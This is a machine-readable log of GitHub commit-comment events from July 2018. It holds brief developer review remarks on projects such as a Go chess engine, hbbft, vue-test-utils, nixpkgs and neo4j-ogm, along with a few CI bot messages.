{"id":"8033615282","type":"CommitCommentEvent","actor":{"login":"joye-ramone"},"repo":{"name":"KRodinn/OGSR-Engine"},"payload":{"comment":{"id":29873370,"position":null,"line":null,"path":null,"commit_id":"c2eed60e09b1619232cee43b6b16a687809b66f6","created_at":"2018-07-29T08:37:03Z","updated_at":"2018-07-29T08:37:03Z","author_association":"CONTRIBUTOR","body":"Ок"}},"created_at":"2018-07-29T08:37:03Z"}
{"id":"8033616412","type":"CommitCommentEvent","actor":{"login":"davegolland"},"repo":{"name":"rictorlome/gogochess"},"payload":{"comment":{"id":29873371,"position":33,"line":33,"path":"minimax.go","commit_id":"bdf594b0a4410d71ffc2422fc0198d1f99c8202b","created_at":"2018-07-29T08:38:03Z","updated_at":"2018-07-29T08:38:03Z","author_association":"COLLABORATOR","body":"OK, I think that we can restore the `maxDepth` check to compare against zero if we also add a check that will terminate early when `successors` is empty.\r\n\r\nSomething like:\r\n```\r\n\tif maxDepth <= 0 {\r\n\t\treturn Evaluate(b), []Board{}\r\n\t}\r\n\r\n\tsuccessors := GetSuccessors(b)\r\n\tif len(successors) == 0 {\r\n\t\treturn Evaluate(b), []Board{}\r\n\t}\r\n```\r\n\r\nIn a terminal state (e.g. checkmate), there are no successors and the search should terminate early. But as written, I think it keeps going and returns some default value for `Best`, which messes up the logic at higher levels of the recursion."}},"created_at":"2018-07-29T08:38:03Z"}
{"id":"8033616666","type":"CommitCommentEvent","actor":{"login":"vkomenda"},"repo":{"name":"poanetwork/hbbft"},"payload":{"comment":{"id":29873372,"position":267,"line":315,"path":"src/agreement/mod.rs","commit_id":"b3bf9e6f2ef279422fe41bc774c7593ddf3f5d32","created_at":"2018-07-29T08:38:14Z","updated_at":"2018-07-29T08:38:14Z","author_association":"CONTRIBUTOR","body":"Yes, I could imagine a fault here. It might say \"Multiple BVal received from node `sender_id`\"."}},"created_at":"2018-07-29T08:38:14Z"}
{"id":"8033617782","type":"CommitCommentEvent","actor":{"login":"38elements"},"repo":{"name":"vuejs/vue-test-utils"},"payload":{"comment":{"id":29873373,"position":2,"line":2,"path":"docs/api/createWrapper.md","commit_id":"ebca3b3160f4b3c09f100fa4bb5deffdfb41f486","created_at":"2018-07-29T08:39:16Z","updated_at":"2018-07-29T08:39:16Z","author_association":"CONTRIBUTOR","body":"I think it is necessary to add the Arguments seciton."}},"created_at":"2018-07-29T08:39:16Z"}
{"id":"8033618774","type":"CommitCommentEvent","actor":{"login":"38elements"},"repo":{"name":"vuejs/vue-test-utils"},"payload":{"comment":{"id":29873375,"position":1,"line":1,"path":"docs/api/createWrapper.md","commit_id":"ebca3b3160f4b3c09f100fa4bb5deffdfb41f486","created_at":"2018-07-29T08:40:09Z","updated_at":"2018-07-29T08:40:09Z","author_association":"CONTRIBUTOR","body":"## createWrapper() -> ## createWrapper(vm)"}},"created_at":"2018-07-29T08:40:09Z"}
{"id":"8033620771","type":"CommitCommentEvent","actor":{"login":"38elements"},"repo":{"name":"vuejs/vue-test-utils"},"payload":{"comment":{"id":29873376,"position":null,"line":null,"path":null,"commit_id":"ebca3b3160f4b3c09f100fa4bb5deffdfb41f486","created_at":"2018-07-29T08:41:45Z","updated_at":"2018-07-29T08:41:45Z","author_association":"CONTRIBUTOR","body":"There is no type definition of `createWrapper()`."}},"created_at":"2018-07-29T08:41:45Z"}
{"id":"8033620832","type":"CommitCommentEvent","actor":{"login":"danieldk"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29873377,"position":6,"line":11,"path":"pkgs/development/python-modules/scikitlearn/default.nix","commit_id":"d1a411468d33a1c135f1ff910cf17243a2afb7f8","created_at":"2018-07-29T08:41:49Z","updated_at":"2018-07-29T08:41:49Z","author_association":"CONTRIBUTOR","body":"This disables the package completely, from the commit message it seems that the goal was to disable tests only? "}},"created_at":"2018-07-29T08:41:49Z"}
{"id":"8033621399","type":"CommitCommentEvent","actor":{"login":"jonasschnelli"},"repo":{"name":"bitcoin/bitcoin"},"payload":{"comment":{"id":29873378,"position":null,"line":null,"path":null,"commit_id":"d2186b3db61a9d4dc2d4a6211573790d9e34bf58","created_at":"2018-07-29T08:42:19Z","updated_at":"2018-07-29T08:42:19Z","author_association":"MEMBER","body":"This has nothing to do with Cobra or any other influencer. The reason why we still linked to bitcoin.org was historical since the domain was once owned by Satoshi.\r\n\r\nIt's a natural and logical step to decouple the Bitcoin Core project from any centralise organised website.\r\n\r\nBitcoin Core is the/a reference implementation of the Bitcoin Protocol and there is no need to link it with any website outside of the projects control."}},"created_at":"2018-07-29T08:42:19Z"}
{"id":"8033622223","type":"CommitCommentEvent","actor":{"login":"SikoraAdam"},"repo":{"name":"SikoraAdam/kodilla-course"},"payload":{"comment":{"id":29873379,"position":null,"line":null,"path":null,"commit_id":"0c9558e42fca5f1cd0df298b49ed86b6a24ff8d8","created_at":"2018-07-29T08:43:04Z","updated_at":"2018-07-29T08:43:04Z","author_association":"OWNER","body":"6.1"}},"created_at":"2018-07-29T08:43:04Z"}
{"id":"8033622285","type":"CommitCommentEvent","actor":{"login":"Zadezter"},"repo":{"name":"ImpladeDeveloped/Implactor"},"payload":{"comment":{"id":29873380,"position":null,"line":null,"path":null,"commit_id":"c05cb289ce41b8f4edaa3dd665f1fab6c66cfe32","created_at":"2018-07-29T08:43:08Z","updated_at":"2018-07-29T08:43:08Z","author_association":"MEMBER","body":"I know and please shut up, @TheFixerDevelopment (Zeao)"}},"created_at":"2018-07-29T08:43:08Z"}
{"id":"8033623961","type":"CommitCommentEvent","actor":{"login":"michael-simons"},"repo":{"name":"neo4j/neo4j-ogm"},"payload":{"comment":{"id":29873382,"position":4,"line":190,"path":"core/src/main/java/org/neo4j/ogm/context/GraphEntityMapper.java","commit_id":"fe0911d48649487eb2d196a8b44f36314ea0313a","created_at":"2018-07-29T08:44:32Z","updated_at":"2018-07-29T08:44:32Z","author_association":"CONTRIBUTOR","body":"Hello @meistermeier and @mp911de I'd be interested in your opinion here. \r\n\r\nI'd like to have the PostLoad method to be able to have any visibility level (and also final) due to various reasons explained in the commit message, much like\r\n\r\n> 3.5.1 Lifecycle Callback Methods\r\n>The callback methods can have public, private, protected, or package level access, but must not be static or final.\r\n\r\nin JPA.\r\n\r\nQuestion is though, what that be the right approach here? How does Spring do this with PostConstruct?"}},"created_at":"2018-07-29T08:44:32Z"}
{"id":"8033624205","type":"CommitCommentEvent","actor":{"login":"FRidh"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29873383,"position":6,"line":11,"path":"pkgs/development/python-modules/scikitlearn/default.nix","commit_id":"d1a411468d33a1c135f1ff910cf17243a2afb7f8","created_at":"2018-07-29T08:44:45Z","updated_at":"2018-07-29T08:44:45Z","author_association":"MEMBER","body":"Oops! Fixed with 6dd7ddd5b8918e9e3c3c3e795b7e5a1bcaa56858."}},"created_at":"2018-07-29T08:44:45Z"}
{"id":"8033624230","type":"CommitCommentEvent","actor":{"login":"38elements"},"repo":{"name":"vuejs/vue-test-utils"},"payload":{"comment":{"id":29873384,"position":4,"line":9,"path":"docs/api/README.md","commit_id":"ebca3b3160f4b3c09f100fa4bb5deffdfb41f486","created_at":"2018-07-29T08:44:46Z","updated_at":"2018-07-29T08:44:46Z","author_association":"CONTRIBUTOR","body":"It is necessary to add link to below page.\r\nhttps://github.com/vuejs/vue-test-utils/blob/8db502dfacf56f5cfc8a914da192f8a43dd5a162/docs/README.md"}},"created_at":"2018-07-29T08:44:46Z"}
{"id":"8033624466","type":"CommitCommentEvent","actor":{"login":"hhdang6637"},"repo":{"name":"hhdang6637/embedded_linux_skeleton"},"payload":{"comment":{"id":29873385,"position":60,"line":60,"path":"applications/lib_app/libfdt/fdt.h","commit_id":"4bfef82b4b88ee90a0e02e40534a1827996ead9f","created_at":"2018-07-29T08:44:56Z","updated_at":"2018-07-29T08:44:56Z","author_association":"OWNER","body":"This is what we need to show firmware information to the user"}},"created_at":"2018-07-29T08:44:56Z"}
{"id":"8033624773","type":"CommitCommentEvent","actor":{"login":"wayne-chen"},"repo":{"name":"r3tk0n/hifi"},"payload":{"comment":{"id":29873387,"position":80,"line":503,"path":"scripts/system/controllers/controllerModules/farActionGrabEntity.js","commit_id":"4c0a4972f51525ccc3932d1a029b79f193815afd","created_at":"2018-07-29T08:45:11Z","updated_at":"2018-07-29T08:45:11Z","author_association":"COLLABORATOR","body":"I think you should fix this line."}},"created_at":"2018-07-29T08:45:11Z"}
{"id":"8033626762","type":"CommitCommentEvent","actor":{"login":"M-E-Steiner"},"repo":{"name":"M-E-Steiner/cSEM"},"payload":{"comment":{"id":29873395,"position":14,"line":50,"path":"R/test_MICOM.R","commit_id":"fcbb979098a87f715c91d2effdd48fbe48509127","created_at":"2018-07-29T08:46:46Z","updated_at":"2018-07-29T08:46:46Z","author_association":"OWNER","body":"i agree. .runs is short and easy to remember and can be used generally"}},"created_at":"2018-07-29T08:46:46Z"}
{"id":"8033630531","type":"CommitCommentEvent","actor":{"login":"kiliak"},"repo":{"name":"Ludeon/RimWorld-fr"},"payload":{"comment":{"id":29873409,"position":null,"line":null,"path":null,"commit_id":"de83e78219c1a31d5962382928f9862924c2d20a","created_at":"2018-07-29T08:49:51Z","updated_at":"2018-07-29T08:49:51Z","author_association":"CONTRIBUTOR","body":"C'est fait, il reste des TODO dans le fichier"}},"created_at":"2018-07-29T08:49:51Z"}
{"id":"8033630672","type":"CommitCommentEvent","actor":{"login":"ramiar20"},"repo":{"name":"googlesamples/android-EmojiCompat"},"payload":{"comment":{"id":29873410,"position":48,"line":48,"path":"app/src/androidTest/java/com/example/android/emojicompat/MainActivityTest.java","commit_id":"ba3f5cb53d37f6939a818fb7a80bd0d13cbbb775","created_at":"2018-07-29T08:49:57Z","updated_at":"2018-07-29T08:49:57Z","author_association":"NONE","body":"df"}},"created_at":"2018-07-29T08:49:57Z"}
{"id":"8033631102","type":"CommitCommentEvent","actor":{"login":"arduino-ci-script-bot"},"repo":{"name":"per1234/arduino-ci-script"},"payload":{"comment":{"id":29873414,"position":null,"line":null,"path":null,"commit_id":"8575b313f01c4734d2beccc912122439af8bd08d","created_at":"2018-07-29T08:50:15Z","updated_at":"2018-07-29T08:50:15Z","author_association":"NONE","body":"Once completed, the job reports for Travis CI [build 732](https://travis-ci.org/per1234/arduino-ci-script/builds/409474709) will be found at:\nhttps://gist.github.com/arduino-ci-script-bot/9371a7dedb73a560142ff2ca514b79db#file-travis_ci_job_report_00732-001-tsv"}},"created_at":"2018-07-29T08:50:15Z"}
{"id":"8033631293","type":"CommitCommentEvent","actor":{"login":"arduino-ci-script-bot"},"repo":{"name":"per1234/arduino-ci-script"},"payload":{"comment":{"id":29873416,"position":null,"line":null,"path":null,"commit_id":"8575b313f01c4734d2beccc912122439af8bd08d","created_at":"2018-07-29T08:50:23Z","updated_at":"2018-07-29T08:50:23Z","author_association":"NONE","body":"Once completed, the job reports for Travis CI [build 732](https://travis-ci.org/per1234/arduino-ci-script/builds/409474709) will be found at:\nhttps://github.com/per1234/CI-reports/tree/arduino-ci-script/build_00732"}},"created_at":"2018-07-29T08:50:23Z"}
{"id":"8033631487","type":"CommitCommentEvent","actor":{"login":"CaoJonas"},"repo":{"name":"CaoJonas/CoolJob"},"payload":{"comment":{"id":29873418,"position":null,"line":null,"path":null,"commit_id":"351a922d33d655ced6b0ac411df55bff206a5440","created_at":"2018-07-29T08:50:32Z","updated_at":"2018-07-29T08:50:32Z","author_association":"OWNER","body":"\r\n![image 2](https://user-images.githubusercontent.com/29527755/43364582-78a1065e-934f-11e8-95e9-e2f178c0e11b.png)\r\n"}},"created_at":"2018-07-29T08:50:32Z"}
{"id":"8033633900","type":"CommitCommentEvent","actor":{"login":"ebaauw"},"repo":{"name":"dresden-elektronik/deconz-rest-plugin"},"payload":{"comment":{"id":29873422,"position":null,"line":null,"path":null,"commit_id":"b570bb4004a4c431ae609e171ee2c4371d7de0e7","created_at":"2018-07-29T08:52:27Z","updated_at":"2018-07-29T08:52:27Z","author_association":"CONTRIBUTOR","body":"@Ronoon, what document did you get these from?  From the ZCL spec:\r\n![untitled 1](https://user-images.githubusercontent.com/22179355/43364555-b7bc43d6-931c-11e8-8216-607fd0251a8d.jpeg)\r\nand\r\n![untitled](https://user-images.githubusercontent.com/22179355/43364537-41ed9a60-931c-11e8-8ff8-1fcf390392c0.jpeg)\r\n\r\n@manup, I might have misunderstood table 7-39, reading `0x01` as `0x0100` instead of `0x0010`.\r\n"}},"created_at":"2018-07-29T08:52:27Z"}
{"id":"8033639703","type":"CommitCommentEvent","actor":{"login":"vkomenda"},"repo":{"name":"poanetwork/hbbft"},"payload":{"comment":{"id":29873434,"position":267,"line":315,"path":"src/agreement/mod.rs","commit_id":"b3bf9e6f2ef279422fe41bc774c7593ddf3f5d32","created_at":"2018-07-29T08:57:06Z","updated_at":"2018-07-29T08:57:06Z","author_association":"CONTRIBUTOR","body":"However it would misfire on a `Term` message. Some identification of the kind of the currently processed message would be required. For example, if the current message is a `Term` then don't return a fault; otherwise do."}},"created_at":"2018-07-29T08:57:06Z"}
{"id":"8033640430","type":"CommitCommentEvent","actor":{"login":"bagder"},"repo":{"name":"curl/curl"},"payload":{"comment":{"id":29873435,"position":null,"line":null,"path":null,"commit_id":"35ecffb9be03d6d52c37163060087a5df51e9b2e","created_at":"2018-07-29T08:57:44Z","updated_at":"2018-07-29T08:57:44Z","author_association":"MEMBER","body":"Thanks, I'll look into it! "}},"created_at":"2018-07-29T08:57:44Z"}
{"id":"8033655034","type":"CommitCommentEvent","actor":{"login":"rico6822"},"repo":{"name":"Regalis11/Barotrauma"},"payload":{"comment":{"id":29873469,"position":null,"line":null,"path":null,"commit_id":"aa5b2a973e3cc4657a231cb6ac633579c8acf03d","created_at":"2018-07-29T09:08:50Z","updated_at":"2018-07-29T09:08:50Z","author_association":"NONE","body":"I am seriously respecting how much work you have put into such a short request I did. I began to understand they may be probably an easier and maybe even glitchless way to do this as I witnessed how many options script editing grands:\r\n\r\nYou can make levels not having to be mirrored in campaign mode, but every time player has to reach a station on west from him, his submarine will be flipped, just like in search and destroy and level will be played from right to left. Otherwise if player goes east level is played from left to right and there is no flipping. Hopefully station maps never generate stations to be perfectly at the north or south from each other and they are always at least some distance at east or west to reach from one point to another.\r\n\r\nWhy a way like this? Because I wander if there would be a glitch the way you do it now making the level be mirrored, when it shouldn't. It works like this:\r\n\r\nIf you reach any station, but you decide to return to previous station by circling to it using the other and you decide to ride your very first path in this experiment (the one you don't use to return) the level will be mirrored from in the place you played it very first time, not returning point.\r\n\r\n\r\n\r\nOptional: Host in multiplayer mode can imply a chance for non-campaign and non-pvp missions to be played from right to left. Just like player had to go west in campaign mode. I wander if this had to affect pvp would coalition submarine start from the right and renegade submarine from the left? This feature would make this game more detailed, than it was."}},"created_at":"2018-07-29T09:08:50Z"}
{"id":"8033655432","type":"CommitCommentEvent","actor":{"login":"chongiscool"},"repo":{"name":"udacity/reactnd-udacimeals-complete"},"payload":{"comment":{"id":29873470,"position":15,"line":15,"path":"src/components/App.js","commit_id":"e01aeaf5719ab83cb4af8bf6aa944148335122f9","created_at":"2018-07-29T09:09:12Z","updated_at":"2018-07-29T09:09:12Z","author_association":"NONE","body":"@BhavikCpatel I am a newbie after I used **Option 2** which is awesome. Then I met a problem which can't show shopping list 'messages' at ShoppingList commit of Part 4 of Lesson 4. After some debugging, I turned the amazing **Option2** back to the original code, and it works which show the meal image and shopping list recipe message when you clicked \"Shopping List\" Nav button. Why am I saying that, because I want to feedback to you but not mean to you, how would you handle this? Can you think about it, I appreciate it. "}},"created_at":"2018-07-29T09:09:12Z"}
{"id":"8033657183","type":"CommitCommentEvent","actor":{"login":"beerdonut"},"repo":{"name":"google/ssl_logger"},"payload":{"comment":{"id":29873471,"position":5,"line":239,"path":"ssl_logger.py","commit_id":"6d76620f87e3243c602b5877d50eac1c1352b784","created_at":"2018-07-29T09:10:40Z","updated_at":"2018-07-29T09:10:40Z","author_association":"NONE","body":"6d76620f87e3243c602b5877d50eac1c1352b784"}},"created_at":"2018-07-29T09:10:40Z"}
{"id":"8033657958","type":"CommitCommentEvent","actor":{"login":"beerdonut"},"repo":{"name":"google/ssl_logger"},"payload":{"comment":{"id":29873472,"position":27,"line":410,"path":"ssl_logger.py","commit_id":"6d76620f87e3243c602b5877d50eac1c1352b784","created_at":"2018-07-29T09:11:19Z","updated_at":"2018-07-29T09:11:19Z","author_association":"NONE","body":"6d76620f87e3243c602b5877d50eac1c1352b784\r\n"}},"created_at":"2018-07-29T09:11:19Z"}
{"id":"8033661605","type":"CommitCommentEvent","actor":{"login":"mp911de"},"repo":{"name":"neo4j/neo4j-ogm"},"payload":{"comment":{"id":29873477,"position":4,"line":190,"path":"core/src/main/java/org/neo4j/ogm/context/GraphEntityMapper.java","commit_id":"fe0911d48649487eb2d196a8b44f36314ea0313a","created_at":"2018-07-29T09:14:19Z","updated_at":"2018-07-29T09:14:19Z","author_association":"NONE","body":"Looking at JSR 250's `@PostConstruct`:\r\n\r\n> - The method MUST NOT have any parameters.\r\n> - The return type of the method MUST be void.\r\n> - The method MUST NOT throw a checked exception.\r\n> - The method on which PostConstruct is applied MAY be public, protected,\r\npackage private or private.\r\n> - The method MUST NOT be static except for the application client.\r\n> - In general, the method MUST NOT be final. However, other specifications are\r\npermitted to relax this requirement on a per-component basis. \r\n\r\nNon-public lifecycle callbacks are desirable. They require action on Java 9+ with modules as using modules must grant access to `neo4j-ogm` to be usable.\r\n\r\n`static` methods are not applicable as they don't include an entity context. JPA's non `final` requirements originates from the ability to create proxies on top of the actual entity."}},"created_at":"2018-07-29T09:14:19Z"}
{"id":"8033664778","type":"CommitCommentEvent","actor":{"login":"1458428190"},"repo":{"name":"1458428190/design-patterns"},"payload":{"comment":{"id":29873483,"position":null,"line":null,"path":null,"commit_id":"cd07971e7e2b58657a123f2f0dd802293f663fba","created_at":"2018-07-29T09:16:54Z","updated_at":"2018-07-29T09:16:54Z","author_association":"OWNER","body":"策略模式"}},"created_at":"2018-07-29T09:16:54Z"}
{"id":"8033664782","type":"CommitCommentEvent","actor":{"login":"nigelcharman"},"repo":{"name":"concordion/concordion-expected-to-fail-info-extension-demo"},"payload":{"comment":{"id":29873484,"position":3,"line":3,"path":"src/test/resources/org/concordion/ext/specification/Index.md","commit_id":"42733d07a6000db4b6cbfc714d69b340e65c6936","created_at":"2018-07-29T09:16:55Z","updated_at":"2018-07-29T09:16:55Z","author_association":"MEMBER","body":"If you use the [run command](https://concordion.org/instrumenting/java/markdown/#run-command), then the link will be highlighted to show whether it is passing or failing. \r\nIt will also allow you to run just the Index to run the other specifications."}},"created_at":"2018-07-29T09:16:55Z"}
{"id":"8033665403","type":"CommitCommentEvent","actor":{"login":"jmroot"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29873486,"position":null,"line":null,"path":null,"commit_id":"0faec67c6645efce76ad42b216fb246c78fcef37","created_at":"2018-07-29T09:17:25Z","updated_at":"2018-07-29T09:17:25Z","author_association":"MEMBER","body":"This one should close https://trac.macports.org/ticket/42512 no?"}},"created_at":"2018-07-29T09:17:25Z"}
{"id":"8033667656","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29873487,"position":null,"line":null,"path":null,"commit_id":"4e7bd3b031258eac1a7735d660d9462764a31626","created_at":"2018-07-29T09:19:07Z","updated_at":"2018-07-29T09:19:07Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-29T09:19:07Z"}
{"id":"8033667782","type":"CommitCommentEvent","actor":{"login":"TheSarrum"},"repo":{"name":"multitheftauto/mtasa-blue"},"payload":{"comment":{"id":29873488,"position":null,"line":null,"path":null,"commit_id":"0cffa9215f4601e42b2dfbc254040aeda3caa8f0","created_at":"2018-07-29T09:19:14Z","updated_at":"2018-07-29T09:19:14Z","author_association":"NONE","body":"Now I have to spend my time on the whowas cmd 😢 "}},"created_at":"2018-07-29T09:19:14Z"}
{"id":"8033670864","type":"CommitCommentEvent","actor":{"login":"danchr"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29873493,"position":null,"line":null,"path":null,"commit_id":"0faec67c6645efce76ad42b216fb246c78fcef37","created_at":"2018-07-29T09:21:48Z","updated_at":"2018-07-29T09:21:48Z","author_association":"CONTRIBUTOR","body":"> This one should close https://trac.macports.org/ticket/42512 no?\r\n\r\nIndeed it should — I'll update the commit message to close that one."}},"created_at":"2018-07-29T09:21:48Z"}
{"id":"8033680227","type":"CommitCommentEvent","actor":{"login":"YaserAbuoun"},"repo":{"name":"YaserAbuoun/Hello-World"},"payload":{"comment":{"id":29873511,"position":null,"line":null,"path":null,"commit_id":"060b229bf9a6c01d575479df25783737402983e9","created_at":"2018-07-29T09:29:27Z","updated_at":"2018-07-29T09:29:27Z","author_association":"OWNER","body":"Hello"}},"created_at":"2018-07-29T09:29:27Z"}
{"id":"8033680605","type":"CommitCommentEvent","actor":{"login":"Dezash"},"repo":{"name":"multitheftauto/mtasa-blue"},"payload":{"comment":{"id":29873512,"position":null,"line":null,"path":null,"commit_id":"0cffa9215f4601e42b2dfbc254040aeda3caa8f0","created_at":"2018-07-29T09:29:48Z","updated_at":"2018-07-29T09:29:48Z","author_association":"CONTRIBUTOR","body":"@TheSarrum you can implement that in like 5 minutes."}},"created_at":"2018-07-29T09:29:48Z"}
{"id":"8033681374","type":"CommitCommentEvent","actor":{"login":"vkomenda"},"repo":{"name":"poanetwork/hbbft"},"payload":{"comment":{"id":29873516,"position":597,"line":578,"path":"src/agreement/mod.rs","commit_id":"b3bf9e6f2ef279422fe41bc774c7593ddf3f5d32","created_at":"2018-07-29T09:30:20Z","updated_at":"2018-07-29T09:30:20Z","author_association":"CONTRIBUTOR","body":"Yes, this branch is reachable only if case of a programming mistake, I think. As an alternative, `coin_step` could be passed as an argument of `try_finish_conf_round` to avoid pattern-matching inside the function."}},"created_at":"2018-07-29T09:30:20Z"}
{"id":"8033684495","type":"CommitCommentEvent","actor":{"login":"MrSongxq"},"repo":{"name":"MrSongxq/test1"},"payload":{"comment":{"id":29873523,"position":null,"line":null,"path":null,"commit_id":"bca7d5f4ebb34f2b1941549cb308ce1f4a479a49","created_at":"2018-07-29T09:32:53Z","updated_at":"2018-07-29T09:32:53Z","author_association":"OWNER","body":"qeqwq"}},"created_at":"2018-07-29T09:32:53Z"}
{"id":"8033685735","type":"CommitCommentEvent","actor":{"login":"MrSongxq"},"repo":{"name":"MrSongxq/test1"},"payload":{"comment":{"id":29873525,"position":null,"line":null,"path":null,"commit_id":"bca7d5f4ebb34f2b1941549cb308ce1f4a479a49","created_at":"2018-07-29T09:33:50Z","updated_at":"2018-07-29T09:33:50Z","author_association":"OWNER","body":"1111122222"}},"created_at":"2018-07-29T09:33:50Z"}
{"id":"8033686333","type":"CommitCommentEvent","actor":{"login":"leal2020"},"repo":{"name":"eubr-bigsea/docker-lemonade"},"payload":{"comment":{"id":29873529,"position":null,"line":null,"path":null,"commit_id":"5dcff2c29a7ad28094e04f5178fd00fd85e792bc","created_at":"2018-07-29T09:34:18Z","updated_at":"2018-07-29T09:34:18Z","author_association":"NONE","body":"Obrigado por ter feito as atualizações, agora está compilando e subindo o docker. Só que vc precisaria melhorar a questão do Sign Up, pois não estou conseguindo criar um usuário e logar. Você poderia, melhorar essa parte do código ou postar como crio o usuário inicial?"}},"created_at":"2018-07-29T09:34:18Z"}
{"id":"8033688033","type":"CommitCommentEvent","actor":{"login":"cq1415583094"},"repo":{"name":"cq1415583094/springcloud"},"payload":{"comment":{"id":29873532,"position":null,"line":null,"path":null,"commit_id":"bea54a10d8eb814bdf05e82dd21601bc5162abac","created_at":"2018-07-29T09:35:37Z","updated_at":"2018-07-29T09:35:37Z","author_association":"OWNER","body":"公共模块"}},"created_at":"2018-07-29T09:35:37Z"}
{"id":"8033689187","type":"CommitCommentEvent","actor":{"login":"znarf"},"repo":{"name":"opencollective/eslint-config-opencollective"},"payload":{"comment":{"id":29873540,"position":99,"line":77,"path":"index.js","commit_id":"35c2389edcd6fd12f6b7b560d0974e8fa70c4ce4","created_at":"2018-07-29T09:36:33Z","updated_at":"2018-07-29T09:36:33Z","author_association":"CONTRIBUTOR","body":"The advantages are explained here (better diffs): https://eslint.org/docs/rules/comma-dangle\r\n\r\nIn your example, it's effectively a lot of extra commas, and annoying.\r\n\r\nIt's currently just a warning and auto-fixable. But we can revisit, maybe allow them without making it mandatory.\r\n"}},"created_at":"2018-07-29T09:36:33Z"}
{"id":"8033689829","type":"CommitCommentEvent","actor":{"login":"pravic"},"repo":{"name":"g-k/cargo-show"},"payload":{"comment":{"id":29873541,"position":5,"line":148,"path":"src/main.rs","commit_id":"ab400d06fb2aec02e928c74d2430bd03b2f65dac","created_at":"2018-07-29T09:37:05Z","updated_at":"2018-07-29T09:37:05Z","author_association":"CONTRIBUTOR","body":":)"}},"created_at":"2018-07-29T09:37:05Z"}
{"id":"8033690349","type":"CommitCommentEvent","actor":{"login":"sachin2107"},"repo":{"name":"sachin2107/java8"},"payload":{"comment":{"id":29873543,"position":null,"line":null,"path":null,"commit_id":"ae489ba8ce632d38e75d06fdb901f6dfb37419b5","created_at":"2018-07-29T09:37:31Z","updated_at":"2018-07-29T09:37:31Z","author_association":"OWNER","body":"list and mat"}},"created_at":"2018-07-29T09:37:31Z"}
{"id":"8033690837","type":"CommitCommentEvent","actor":{"login":"nickkolok"},"repo":{"name":"ijustbsd/ipt_connect"},"payload":{"comment":{"id":29873544,"position":19,"line":93,"path":"ipt_connect/IPTdev/views.py","commit_id":"569c4f685f3aa9a78c41ee56016561c1af912360","created_at":"2018-07-29T09:37:57Z","updated_at":"2018-07-29T09:37:57Z","author_association":"NONE","body":"Is the personal ranking calculated even if it is disabled? O_o\r\nAnd I still advice you to separate the calculations into a function."}},"created_at":"2018-07-29T09:37:57Z"}
{"id":"8033691805","type":"CommitCommentEvent","actor":{"login":"Hypro999"},"repo":{"name":"Hypro999/Recruitments-Portal"},"payload":{"comment":{"id":29873546,"position":null,"line":null,"path":null,"commit_id":"415be28b1c643eb48b534ce0b2cb32a7d4cb3803","created_at":"2018-07-29T09:38:44Z","updated_at":"2018-07-29T09:38:44Z","author_association":"OWNER","body":"In retrospect it would have been better to also make smaller, sub-releases between the previous release and this current release."}},"created_at":"2018-07-29T09:38:44Z"}
{"id":"8033692033","type":"CommitCommentEvent","actor":{"login":"hyyun"},"repo":{"name":"hyyun/sweetspace"},"payload":{"comment":{"id":29873547,"position":null,"line":null,"path":null,"commit_id":"9d97ca82e210ac180c471f1d5542954414d5b4dc","created_at":"2018-07-29T09:38:56Z","updated_at":"2018-07-29T09:38:56Z","author_association":"OWNER","body":"메롱"}},"created_at":"2018-07-29T09:38:56Z"}
{"id":"8033692445","type":"CommitCommentEvent","actor":{"login":"yjqiang"},"repo":{"name":"yjqiang/bilibili-live-tools"},"payload":{"comment":{"id":29873548,"position":null,"line":null,"path":null,"commit_id":"2c84cebc144ad6835a7625b9e720523bece39874","created_at":"2018-07-29T09:39:17Z","updated_at":"2018-07-29T09:39:17Z","author_association":"OWNER","body":"#76 "}},"created_at":"2018-07-29T09:39:17Z"}
{"id":"8033692670","type":"CommitCommentEvent","actor":{"login":"zhangbaiwan001"},"repo":{"name":"zhangbaiwan001/gitku"},"payload":{"comment":{"id":29873549,"position":null,"line":null,"path":null,"commit_id":"b986ba789f38405cfa66a45f480aec4331772bb4","created_at":"2018-07-29T09:39:27Z","updated_at":"2018-07-29T09:39:27Z","author_association":"OWNER","body":"没问题"}},"created_at":"2018-07-29T09:39:27Z"}
{"id":"8033693395","type":"CommitCommentEvent","actor":{"login":"zhangbaiwan001"},"repo":{"name":"zhangbaiwan001/gitku"},"payload":{"comment":{"id":29873551,"position":null,"line":null,"path":null,"commit_id":"b986ba789f38405cfa66a45f480aec4331772bb4","created_at":"2018-07-29T09:40:02Z","updated_at":"2018-07-29T09:40:02Z","author_association":"OWNER","body":"没问题了"}},"created_at":"2018-07-29T09:40:02Z"}
{"id":"8033697948","type":"CommitCommentEvent","actor":{"login":"geoffthemedio"},"repo":{"name":"o01eg/freeorion"},"payload":{"comment":{"id":29873562,"position":45,"line":1044,"path":"server/ServerFSM.cpp","commit_id":"f78cf71916910d975f038a6b0620bbc116731ce5","created_at":"2018-07-29T09:43:54Z","updated_at":"2018-07-29T09:43:54Z","author_association":"NONE","body":"comment what each of these cases represent?"}},"created_at":"2018-07-29T09:43:54Z"}
{"id":"8033702122","type":"CommitCommentEvent","actor":{"login":"Levitanious"},"repo":{"name":"Levitanious/tempest-cms"},"payload":{"comment":{"id":29873570,"position":20,"line":20,"path":"data/Readme.md","commit_id":"b1381f80b4a2830540a4800f87c537c094a4f79f","created_at":"2018-07-29T09:47:31Z","updated_at":"2018-07-29T09:47:31Z","author_association":"OWNER","body":"Shouldn't this be a warning on top of the file, lmao XD No, that's not me being a picky pickle, just having fun."}},"created_at":"2018-07-29T09:47:31Z"}
